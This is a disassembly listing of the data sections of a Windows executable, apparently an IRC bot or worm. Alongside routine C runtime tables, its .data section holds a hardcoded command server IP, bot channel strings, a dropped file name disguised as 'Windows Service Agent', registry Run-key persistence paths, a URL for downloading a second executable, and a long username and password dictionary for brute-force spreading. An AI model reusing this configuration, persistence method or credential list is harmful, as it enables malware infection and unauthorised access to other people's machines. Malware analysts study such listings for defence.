aWed db 'Wed',0 ; DATA XREF: .data:00455F5C�o
aTue db 'Tue',0 ; DATA XREF: .data:00455F58�o
aMon db 'Mon',0 ; DATA XREF: .data:00455F54�o
aSun db 'Sun',0 ; DATA XREF: .data:off_455F50�o
; char aAP[]
aAP db 'a/p',0 ; DATA XREF: sub_439390:loc_439583�o
; char aAmPm[]
aAmPm db 'am/pm',0 ; DATA XREF: sub_439390:loc_439563�o
align 10h
aInithelp_c db 'inithelp.c',0 ; DATA XREF: sub_439950+9C�o
; sub_439950+F1�o
align 10h
dword_43F040 dd 0FFFFFFFFh ; DATA XREF: ___crtGetStringTypeW+5�o
dd offset loc_439D17
dd offset loc_439D1D
dd 0FFFFFFFFh
dd offset loc_439D96
dd offset loc_439D9C
aWtombenv_c db 'wtombenv.c',0 ; DATA XREF: ___wtomb_environ+44�o
align 8
dword_43F068 dd 0FFFFFFFFh ; DATA XREF: ___crtGetLocaleInfoW+5�o
dd offset loc_43A7CD
dd offset loc_43A7D3
align 8
dword_43F078 dd 0FFFFFFFFh ; DATA XREF: ___crtGetLocaleInfoA+5�o
dd offset loc_43A96F
dd offset loc_43A975
aA_cmp_c db 'a_cmp.c',0 ; DATA XREF: ___crtCompareStringA+17F�o
; char aCchcount10Cchc[]
aCchcount10Cchc db 'cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0',0
; DATA XREF: ___crtCompareStringA:loc_43AB93�o
align 10h
dword_43F0D0 dd 0FFFFFFFFh ; DATA XREF: ___crtCompareStringA+5�o
dd offset loc_43ACFF
dd offset loc_43AD05
dd 0FFFFFFFFh
dd offset loc_43AD9D
dd offset loc_43ADA3
aSetenv_c db 'setenv.c',0 ; DATA XREF: ___crtsetenv+B2�o
; ___crtsetenv+F2�o ...
align 4
aStringTooLong db 'string too long',0 ; DATA XREF: sub_43B3B0+1F�o
dd offset dword_43F200
off_43F108 dd offset sub_43B530 ; DATA XREF: sub_43B410+44�o
; sub_43B4D0+1F�o ...
dd offset sub_43B480 ; ?what@runtime_error@std@@UBEPBDXZ
; doubtful name
dd offset sub_43B4A0
dd offset dword_43F250
off_43F118 dd offset sub_43B650 ; DATA XREF: sub_43B560+16�o
; sub_43B600+A�o ...
dd offset sub_43B480 ; ?what@runtime_error@std@@UBEPBDXZ
; doubtful name
dd offset sub_43B620
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_43B6B0+1F�o
dd offset dword_43F2A0
off_43F140 dd offset sub_43B790 ; DATA XREF: sub_43B710+16�o
; sub_43B740+A�o ...
dd offset sub_43B480 ; ?what@runtime_error@std@@UBEPBDXZ
; doubtful name
dd offset sub_43B760
dd offset dword_43F2D0
off_43F150 dd offset ??_Gexception@@UAEPAXI@Z ; DATA XREF: .text:0043BE5A�o
; exception::exception(char const * const &)+C�o ...
; exception::`scalar deleting destructor'(uint)
dd offset ?what@exception@@UBEPBDXZ ; exception::what(void)
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: exception::what(void):loc_43C038�o
align 4
dd offset dword_43F318
off_43F170 dd offset ??_Gtype_info@@UAEPAXI@Z
; DATA XREF: type_info::~type_info(void)+A�o
; type_info::type_info(type_info const &)+A�o ...
; type_info::`scalar deleting destructor'(uint)
align 8
dword_43F178 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: _CxxThrowException(x,x)+D�o
dd 3, 19930520h, 2 dup(0)
dword_43F198 dd 0FFFFFFFFh ; DATA XREF: ___crtLCMapStringW+5�o
dd offset loc_43C4BF
dd offset loc_43C4C5
dd 0FFFFFFFFh
dd offset loc_43C564
dd offset loc_43C56A
off_43F1B0 dd offset off_456300 ; DATA XREF: .rdata:0043F1E4�o
; .rdata:0043F238�o ...
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_43F1C8 dd offset off_456318 ; DATA XREF: .rdata:off_43F1E0�o
; .rdata:0043F234�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
off_43F1E0 dd offset off_43F1C8 ; DATA XREF: .rdata:0043F1FC�o
dd offset off_43F1B0
dword_43F1E8 dd 4 dup(0) ; DATA XREF: .rdata:0043F210�o
dd 2
dd offset off_43F1E0
dword_43F200 dd 3 dup(0) ; DATA XREF: .rdata:0043F104�o
dd offset off_456318
dd offset dword_43F1E8+8
align 8
off_43F218 dd offset off_456338 ; DATA XREF: .rdata:off_43F230�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
off_43F230 dd offset off_43F218 ; DATA XREF: .rdata:0043F24C�o
dd offset off_43F1C8
dd offset off_43F1B0
dword_43F23C dd 3 dup(0) ; DATA XREF: .rdata:0043F260�o
dd 3
dd offset off_43F230
dword_43F250 dd 3 dup(0) ; DATA XREF: .rdata:0043F114�o
dd offset off_456338
dd offset dword_43F23C+4
align 8
off_43F268 dd offset off_456358 ; DATA XREF: .rdata:off_43F280�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
off_43F280 dd offset off_43F268 ; DATA XREF: .rdata:0043F29C�o
dd offset off_43F1C8
dd offset off_43F1B0
dword_43F28C dd 3 dup(0) ; DATA XREF: .rdata:0043F2B0�o
dd 3
dd offset off_43F280
dword_43F2A0 dd 3 dup(0) ; DATA XREF: .rdata:0043F13C�o
dd offset off_456358
dd offset dword_43F28C+4
off_43F2B4 dd offset off_43F1B0 ; DATA XREF: .rdata:0043F2CC�o
dword_43F2B8 dd 4 dup(0) ; DATA XREF: .rdata:0043F2E0�o
dd 1
dd offset off_43F2B4
dword_43F2D0 dd 3 dup(0) ; DATA XREF: .rdata:0043F14C�o
dd offset off_456300
dd offset dword_43F2B8+8
align 8
off_43F2E8 dd offset off_456378 ; DATA XREF: .rdata:off_43F300�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_43F300 dd offset off_43F2E8 ; DATA XREF: .rdata:0043F314�o
dd 0
db 0 ; DATA XREF: .rdata:0043F328�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1
dd offset off_43F300
dword_43F318 dd 3 dup(0) ; DATA XREF: .rdata:0043F16C�o
dd offset off_456378
dd offset unk_43F308
align 10h
dword_43F330 dd 19930520h, 2 ; DATA XREF: .text:loc_43C78F�o
dd offset dword_43F350
dd 5 dup(0)
dword_43F350 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043F338�o
dd offset sub_43C778
dd 0
dd offset sub_43C770
dword_43F360 dd 19930520h, 2 ; DATA XREF: .text:loc_43C7A9�o
dd offset dword_43F380
dd 5 dup(0)
dword_43F380 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043F368�o
dd offset sub_43C799
dd 0
dd offset sub_43C7A1
dword_43F390 dd 19930520h, 2 ; DATA XREF: .text:loc_43C7B4�o
dd offset dword_43F3B0
dd 1
dd offset dword_43F3C0
align 10h
dword_43F3B0 dd 0FFFFFFFFh, 0 ; DATA XREF: .rdata:0043F398�o
dd 0FFFFFFFFh, 0
dword_43F3C0 dd 2 dup(0) ; DATA XREF: .rdata:0043F3A0�o
dd 2 dup(1)
dd offset dword_43F3D8
align 8
dword_43F3D8 dd 3 dup(0) ; DATA XREF: .rdata:0043F3D0�o
dd offset loc_40E1ED
dword_43F3E8 dd 0 ; DATA XREF: .rdata:0043F454�o
; .rdata:0043F4C0�o ...
dd offset off_456300
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch
dd offset ??0exception@@QAE@ABV0@@Z ; exception::exception(exception const &)
dword_43F404 dd 2 dup(0) ; DATA XREF: .rdata:0043F450�o
; .rdata:0043F4BC�o ...
dd offset off_456318
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch
dd offset sub_43B410
dword_43F424 dd 2 dup(0) ; DATA XREF: .rdata:0043F44C�o
dd offset off_456338
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch
dd offset sub_43B680
align 8
dword_43F448 dd 3 ; DATA XREF: .rdata:0043F464�o
dd offset dword_43F424+4
dd offset dword_43F404+4
dd offset dword_43F3E8
dword_43F458 dd 0 ; DATA XREF: sub_43B3B0+3F�o
; sub_43B620+15�o
dd offset sub_43B600
dd 0
dd offset dword_43F448
dword_43F468 dd 19930520h, 1 ; DATA XREF: SEH_43B3B0�o
dd offset dword_43F488
dd 5 dup(0)
dword_43F488 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043F470�o
dd offset sub_43C7C0
dword_43F490 dd 19930520h, 1 ; DATA XREF: SEH_43B410�o
dd offset dword_43F4B0
dd 5 dup(0)
dword_43F4B0 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043F498�o
dd offset sub_43C7E0
dword_43F4B8 dd 2 ; DATA XREF: .rdata:0043F4D4�o
dd offset dword_43F404+4
dd offset dword_43F3E8
align 8
dword_43F4C8 dd 0 ; DATA XREF: sub_43B4A0+15�o
dd offset sub_43B4D0
dd 0
dd offset dword_43F4B8
dword_43F4D8 dd 19930520h, 1 ; DATA XREF: SEH_43B4D0�o
dd offset dword_43F4F8
dd 5 dup(0)
dword_43F4F8 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043F4E0�o
dd offset sub_43C800
dword_43F500 dd 19930520h, 1 ; DATA XREF: SEH_43B590�o
dd offset dword_43F520
dd 5 dup(0)
dword_43F520 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043F508�o
dd offset sub_43C820
dword_43F528 dd 0 ; DATA XREF: .rdata:0043F54C�o
dd offset off_456358
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch
dd offset sub_43B7C0
align 8
dword_43F548 dd 3 ; DATA XREF: .rdata:0043F564�o
dd offset dword_43F528
dd offset dword_43F404+4
dd offset dword_43F3E8
dword_43F558 dd 0 ; DATA XREF: sub_43B6B0+3F�o
; sub_43B760+15�o
dd offset sub_43B740
dd 0
dd offset dword_43F548
dword_43F568 dd 19930520h, 1 ; DATA XREF: SEH_43B6B0�o
dd offset dword_43F588
dd 5 dup(0)
dword_43F588 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043F570�o
dd offset sub_43C840
_rdata ends
; Section 3. (virtual address 00040000)
; Virtual size : 000B5EBD ( 745149.)
; Section size in file : 000B5EBD ( 745149.)
; Offset to raw data for section: 00040000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 440000h
dword_440000 dd 0 ; DATA XREF: __cinit+29�o
dd offset loc_4013FF
dd offset sub_40DCF5
dd offset sub_40E2FE
dd offset sub_40F17C
dd offset unknown_libname_31 ; Microsoft VisualC 2-8/net runtime
dword_440018 dd 0 ; DATA XREF: __cinit+24�o
dword_44001C dd 0 ; DATA XREF: __cinit+17�o
dd offset ___onexitinit
dd offset ___initstdio
dd offset ___initmbctable
dd offset ?__CxxSetUnhandledExceptionFilter@@YAXXZ ; __CxxSetUnhandledExceptionFilter(void)
dword_440030 dd 0 ; DATA XREF: __cinit:loc_41F692�o
dword_440034 dd 0 ; DATA XREF: _doexit+76�o
dd offset ___endstdio
dword_44003C dd 0 ; DATA XREF: _doexit:loc_41F7B1�o
dword_440040 dd 0 ; DATA XREF: _doexit+88�o
dd offset ?__CxxRestoreUnhandledExceptionFilter@@YAXXZ ; __CxxRestoreUnhandledExceptionFilter(void)
dword_440048 dd 2 dup(0) ; DATA XREF: _doexit:loc_41F7C3�o
dword_440050 dd 80000002h ; DATA XREF: sub_401000+7�o
dd offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h
dd offset aSoftwareMicr_1 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000001h
dd offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dword_440068 dd 6272h ; DATA XREF: sub_401000+63�o
; sub_4010AB+B�o
dword_44006C dd 1639h ; DATA XREF: WinMain(x,x,x,x)+4A4�r
; WinMain(x,x,x,x)+539�r
dword_440070 dd 0F51h ; DATA XREF: WinMain(x,x,x,x)+585�r
dword_440074 dd 7E4h ; DATA XREF: sub_401CC7:loc_40481E�r
dword_440078 dd 45h ; DATA XREF: sub_401CC7+2048�r
; sub_40C165+3B�r
dword_44007C dd 50h ; DATA XREF: sub_401CC7:loc_403DFD�r
; sub_40C165:loc_40C556�r
dword_440080 dd 20Bh ; DATA XREF: sub_401CC7:loc_403F89�r
word_440084 dw 7C7h ; DATA XREF: sub_401CC7:loc_404941�r
align 4
dword_440088 dd 1 ; DATA XREF: sub_401CC7+62A�r
dword_44008C dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_40175C�r
; sub_41912E+C�r
byte_440090 db 2Eh ; DATA XREF: sub_401CC7+A5E�r
; sub_401CC7+B18�r ...
align 4
dword_440094 dd 5 ; DATA XREF: sub_40B0A2+3A�r
; sub_40B0A2+60�r ...
; int dword_440098
dword_440098 dd 4 ; DATA XREF: sub_4019E7+78�r
; sub_401CC7+270�r ...
; int dword_44009C
dword_44009C dd 1 ; DATA XREF: sub_4019E7+72�r
; sub_401CC7+26A�r
; char aK3y[]
aK3y db 'k3y',0 ; DATA XREF: WinMain(x,x,x,x)+5D�o
; sub_401CC7:loc_40468F�o ...
aH1d3 db 'h1d3',0 ; DATA XREF: sub_401CC7:loc_404B48�o
align 4
; char aIkke[]
aIkke db 'ikke',0 ; DATA XREF: sub_401CC7+7ED4�o
; sub_401CC7+7FA3�o
align 4
; char Source[]
Source db '69.14.32.48',0 ; DATA XREF: WinMain(x,x,x,x)+490�o
; WinMain(x,x,x,x)+52A�o
; char aPiavnc[]
aPiavnc db '##piavnc##',0 ; DATA XREF: WinMain(x,x,x,x)+4B0�o
; WinMain(x,x,x,x)+540�o ...
align 4
; char Str[]
Str db 'wgl23.exe',0 ; DATA XREF: WinMain(x,x,x,x)+143�o
; WinMain(x,x,x,x)+167�w ...
align 4
; char aWinnt_bat[]
aWinnt_bat db 'winnt.bat',0 ; DATA XREF: sub_4126CC+3D�o
align 4
aWindowsService db 'Windows Service Agent',0 ; DATA XREF: sub_401000+E�o
align 4
aPwnz db 'PwnZ|',0 ; DATA XREF: sub_40B10F+12�o
align 4
aWinsys_dat db 'winsys.dat',0
align 10h
aXI db '-x+i',0 ; DATA XREF: sub_401CC7+8026�o
align 4
; char aHelp[]
aHelp db '##help',0 ; DATA XREF: sub_401CC7+1EAB�o
; sub_401CC7+1EBC�o ...
align 10h
; char aHelp_1[]
aHelp_1 db '##help',0 ; DATA XREF: sub_401CC7+451A�o
align 4
; char aHelp_0[]
aHelp_0 db '##help',0 ; DATA XREF: sub_401CC7+4145�o
; sub_401CC7+4295�o
align 10h
off_440130 dd offset dword_44049C ; DATA XREF: sub_401CC7:loc_409BEE�o
off_440134 dd offset aMircV6_16Khale ; DATA XREF: sub_401CC7+892�r
; sub_401CC7+7F43�o
; "mIRC v6.16 Khaled Mardam-Bey"
dd offset aMircV6_17Khale ; "mIRC v6.17 Khaled Mardam-Bey"
dd offset aMircV6_20Khale ; "mIRC v6.20 Khaled Mardam-Bey"
dd offset aMircV6_21Khale ; "mIRC v6.21 Khaled Mardam-Bey"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .data:00440054�o
; .data:00440064�o
align 4
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: .data:0044005C�o
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_41AD95+28�o
; sub_41B0B9+28�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_41AD95+D4�o
; sub_41B0B9+D4�o
align 4
dd 1
dword_4401F0 dd 1 ; DATA XREF: .text:0041C5E2�w
aHttp141_62_120 db 'http://141.62.120.99:8080/piaa.exe',0
align 4
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 8
dd offset dword_4E40B8
dd offset aAdministrato_1 ; "administrator"
dd offset aAdministrado_0 ; "administrador"
dd offset aAdministrate_0 ; "administrateur"
dd offset aAdministrat_0 ; "administrat"
dd offset aAdmins_0 ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_1 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003_0 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_1 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault_0 ; "default"
dd offset aSystem ; "system"
dd offset aServer_6 ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_4 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin_2 ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase_0 ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2_0 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle_0 ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_1 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent_0 ; "student"
dd offset aTeacher_0 ; "teacher"
dd offset aStaff_0 ; "staff"
align 8
dword_440498 dd 10h ; DATA XREF: sub_401CC7+AC8�r
; sub_401CC7+AF4�r ...
dword_44049C dd 2A402Ah ; DATA XREF: .data:off_440130�o
aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_440134�o
align 10h
aMircV6_17Khale db 'mIRC v6.17 Khaled Mardam-Bey',0 ; DATA XREF: .data:00440138�o
align 10h
aMircV6_20Khale db 'mIRC v6.20 Khaled Mardam-Bey',0 ; DATA XREF: .data:0044013C�o
align 10h
aMircV6_21Khale db 'mIRC v6.21 Khaled Mardam-Bey',0 ; DATA XREF: .data:00440140�o
align 10h
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:00440218�o
align 10h
aAdministrador db 'administrador',0 ; DATA XREF: .data:0044021C�o
align 10h
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:00440220�o
align 10h
aAdministrat db 'administrat',0 ; DATA XREF: .data:00440224�o
aAdmins db 'admins',0 ; DATA XREF: .data:00440228�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .data:0044022C�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:00440230�o
align 4
aRoot db 'root',0 ; DATA XREF: .data:00440234�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:00440238�o
align 4
aOwner db 'owner',0 ; DATA XREF: .data:0044023C�o
align 10h
aStudent db 'student',0 ; DATA XREF: .data:00440240�o
aTeacher db 'teacher',0 ; DATA XREF: .data:00440244�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:00440248�o
align 4
aGuest_0 db 'guest',0 ; DATA XREF: .data:0044024C�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:00440250�o
aDatabase db 'database',0 ; DATA XREF: .data:00440254�o
align 4
aDba db 'dba',0 ; DATA XREF: .data:00440258�o
aOracle db 'oracle',0 ; DATA XREF: .data:0044025C�o
align 4
aDb2 db 'db2',0 ; DATA XREF: .data:00440260�o
aAdministrato_1 db 'administrator',0 ; DATA XREF: .data:0044026C�o
align 4
aAdministrado_0 db 'administrador',0 ; DATA XREF: .data:00440270�o
align 4
aAdministrate_0 db 'administrateur',0 ; DATA XREF: .data:00440274�o
align 4
aAdministrat_0 db 'administrat',0 ; DATA XREF: .data:00440278�o
aAdmins_0 db 'admins',0 ; DATA XREF: .data:0044027C�o
align 4
aAdmin_0 db 'admin',0 ; DATA XREF: .data:00440280�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:00440284�o
aPassword1 db 'password1',0 ; DATA XREF: .data:00440288�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:0044028C�o
align 10h
aPasswd db 'passwd',0 ; DATA XREF: .data:00440290�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:00440294�o
align 4
aPass_1 db 'pass',0 ; DATA XREF: .data:00440298�o
align 4
aPwd db 'pwd',0 ; DATA XREF: .data:0044029C�o
a007 db '007',0 ; DATA XREF: .data:004402A0�o
a1: ; DATA XREF: .data:004402A4�o
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: .data:004402A8�o
align 4
a123 db '123',0 ; DATA XREF: .data:004402AC�o
a1234 db '1234',0 ; DATA XREF: .data:004402B0�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:004402B4�o
align 10h
a123456 db '123456',0 ; DATA XREF: .data:004402B8�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:004402BC�o
a12345678 db '12345678',0 ; DATA XREF: .data:004402C0�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:004402C4�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:004402C8�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:004402CC�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:004402D0�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:004402D4�o
align 4
a2003_0 db '2003',0 ; DATA XREF: .data:004402D8�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:004402DC�o
align 4
aTest db 'test',0 ; DATA XREF: .data:004402E0�o
align 4
aGuest_1 db 'guest',0 ; DATA XREF: .data:004402E4�o
align 4
aNone db 'none',0 ; DATA XREF: .data:004402E8�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:004402EC�o
align 4
aUnix db 'unix',0 ; DATA XREF: .data:004402F0�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:004402F4�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:004402F8�o
align 4
aDefault_0 db 'default',0 ; DATA XREF: .data:004402FC�o
aSystem db 'system',0 ; DATA XREF: .data:00440300�o
align 4
aServer_6 db 'server',0 ; DATA XREF: .data:00440304�o
align 10h
aRoot_0 db 'root',0 ; DATA XREF: .data:00440308�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:0044030C�o
align 10h
aQwerty db 'qwerty',0 ; DATA XREF: .data:00440310�o
align 4
aMail db 'mail',0 ; DATA XREF: .data:00440314�o
align 10h
aOutlook db 'outlook',0 ; DATA XREF: .data:00440318�o
aWeb db 'web',0 ; DATA XREF: .data:0044031C�o
aWww db 'www',0 ; DATA XREF: .data:00440320�o
aInternet db 'internet',0 ; DATA XREF: .data:00440324�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:00440328�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:0044032C�o
align 4
aHome db 'home',0 ; DATA XREF: .data:00440330�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:00440334�o
align 4
aUser_4 db 'user',0 ; DATA XREF: .data:00440338�o
align 10h
aOem db 'oem',0 ; DATA XREF: .data:0044033C�o
aOemuser db 'oemuser',0 ; DATA XREF: .data:00440340�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:00440344�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:00440348�o
aWin98 db 'win98',0 ; DATA XREF: .data:0044034C�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:00440350�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .data:00440354�o
align 4
aWinnt db 'winnt',0 ; DATA XREF: .data:00440358�o
align 10h
aWin2000 db 'win2000',0 ; DATA XREF: .data:0044035C�o
aQaz db 'qaz',0 ; DATA XREF: .data:00440360�o
aAsd db 'asd',0 ; DATA XREF: .data:00440364�o
aZxc db 'zxc',0 ; DATA XREF: .data:00440368�o
aQwe db 'qwe',0 ; DATA XREF: .data:0044036C�o
aBob db 'bob',0 ; DATA XREF: .data:00440370�o
aJen db 'jen',0 ; DATA XREF: .data:00440374�o
aJoe db 'joe',0 ; DATA XREF: .data:00440378�o
aFred db 'fred',0 ; DATA XREF: .data:0044037C�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:00440380�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:00440384�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:00440388�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0044038C�o
align 4
aLuke db 'luke',0 ; DATA XREF: .data:00440390�o
align 4
aSam db 'sam',0 ; DATA XREF: .data:00440394�o
aSue db 'sue',0 ; DATA XREF: .data:00440398�o
aSusan db 'susan',0 ; DATA XREF: .data:0044039C�o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: .data:004403A0�o
align 4
aBrian db 'brian',0 ; DATA XREF: .data:004403A4�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:004403A8�o
aNeil db 'neil',0 ; DATA XREF: .data:004403AC�o
align 10h
aIan db 'ian',0 ; DATA XREF: .data:004403B0�o
aChris db 'chris',0 ; DATA XREF: .data:004403B4�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:004403B8�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:004403BC�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:004403C0�o
align 4
aBob_0 db 'bob',0 ; DATA XREF: .data:004403C4�o
aKatie db 'katie',0 ; DATA XREF: .data:004403C8�o
align 10h
aMary db 'mary',0 ; DATA XREF: .data:004403CC�o
align 4
aLogin_2 db 'login',0 ; DATA XREF: .data:004403D0�o
align 10h
aLoginpass db 'loginpass',0 ; DATA XREF: .data:004403D4�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:004403D8�o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:004403DC�o
align 10h
aExchange db 'exchange',0 ; DATA XREF: .data:004403E0�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:004403E4�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:004403E8�o
align 4
aSlut db 'slut',0 ; DATA XREF: .data:004403EC�o
align 4
aSex db 'sex',0 ; DATA XREF: .data:004403F0�o
aGod db 'god',0 ; DATA XREF: .data:004403F4�o
aHell db 'hell',0 ; DATA XREF: .data:004403F8�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:004403FC�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:00440400�o
align 4
